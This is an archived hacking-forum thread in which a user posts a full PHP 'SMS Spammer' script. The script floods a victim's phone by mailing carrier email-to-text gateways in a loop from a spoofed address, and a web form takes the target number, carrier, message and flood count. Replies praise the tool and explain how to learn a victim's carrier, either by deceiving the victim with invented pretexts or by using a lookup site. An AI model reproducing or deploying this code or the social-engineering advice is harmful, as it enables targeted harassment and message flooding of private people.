PDA

View Full Version : PHP SMS Spammer



Tonic
11-02-2009, 08:21 AM
Did me some googling for service receipt addresses and slapped er together.



<?php
//SMS Spammer
$receipt = htmlentities($_POST['to']); //Phone number
$carrier = $_POST['service']; //The victims provider
$message = htmlentities(stripslashes($_POST['message'])); //Message to flood
$flood = $_POST['flood']; //Flood amount

if((empty($_POST['to'])) || (empty($_POST['service'])) || (empty($_POST['message'])) || (empty($_POST['flood']))) {
echo "One of the fields are empty, please fill them in.";
}
else {

if($carrier == "verizon") {
$number = $receipt . "@vtext.com";
}
elseif($carrier == "tmobile") {
$number = $receipt . "@tomomail.net";
}
elseif($carrier == "sprint") {
$number = $receipt . "@messaging.sprintpcs.com";
}
elseif($carrier == "att") {
$number = $receipt . "@txt.att.net";
}
elseif($carrier == "virgin") {
$number = $receipt . "@vmobl.com";
}
elseif($carrier == "boost") {
$number = $receipt . "@myboostmobile.com";
}
elseif($carrier == "nextel") {
$number = $receipt . "@messaging.nextel.com";
}
elseif($carrier == "alltel") {
$number = $receipt . "@message.alltel.com";
}
$i=0;
while ($i < $flood) {
mail($number, "Shititsaflood", $message, "From: Annoyimous@poopflood.com");
$i++;
}
echo "You have successfully flooded the number " . $receipt . ", thanks for trying the flooder out!";
}
?>
<br />
<form action="" method="post">
Phone number:<br />
<input type="text" name="to" maxlength="10"/>
<br />
Flood amount:<br />
<input type="text" name="flood" />
<br />
Service provider: <select name="service"><option value="verizon">Verizon Wireless</option>
<option value="tmobile">T-Mobile</option>
<option value="sprint">Sprint</option>
<option value="att">AT&T</option>
<option value="virgin">Virgin Mobile</option>
<option value="boost">Boost Mobile</option>
<option value="nextel">Nextel</option>
<option value="alltel">Alltel</option>
</select>
<br />
Message:<br />
<textarea cols="50" rows="5" name="message"></textarea>
<br />
<input type="submit" value="Spam'er!">
</form>

Casualdemeanor
11-02-2009, 09:16 PM
Damn nice L33t skills :D

SonniE
11-05-2009, 04:54 AM
lol yeah i saw an example of this somewhere before thought it was interesting.

Pain_ELementaL
11-05-2009, 05:13 AM
"Annoyimous@poopflood.com"

Annoyimous ehh??

SonniE
11-05-2009, 05:14 AM
"Annoyimous@poopflood.com"

Annoyimous ehh??




Obviously anonymous was already taken...=pp

FiShY_MaN
11-05-2009, 08:14 AM
Obviously anonymous was already taken...=pp

YuPP!

WMD54
11-05-2009, 06:56 PM
i haven't tried this yet, so excuse me if i ask a dumb question, but it looks like you need the service provider. if i only have the number, is there some way of finding the provider?

Scruffy120
11-05-2009, 07:14 PM
i haven't tried this yet, so excuse me if i ask a question, but it looks like you need the . if i only have the number, is there some way of finding the provider?

look at victims phone? learn to social engineer...tell them you wanna talk to them but want to know if they have the same service is you, so you have like free calling or w/e....make up bullshit, youd be surprised how stupid people are in the real world lol

solowestside
11-05-2009, 09:16 PM
or go to www.fonefinder.net and put number in and it will tell you the carrier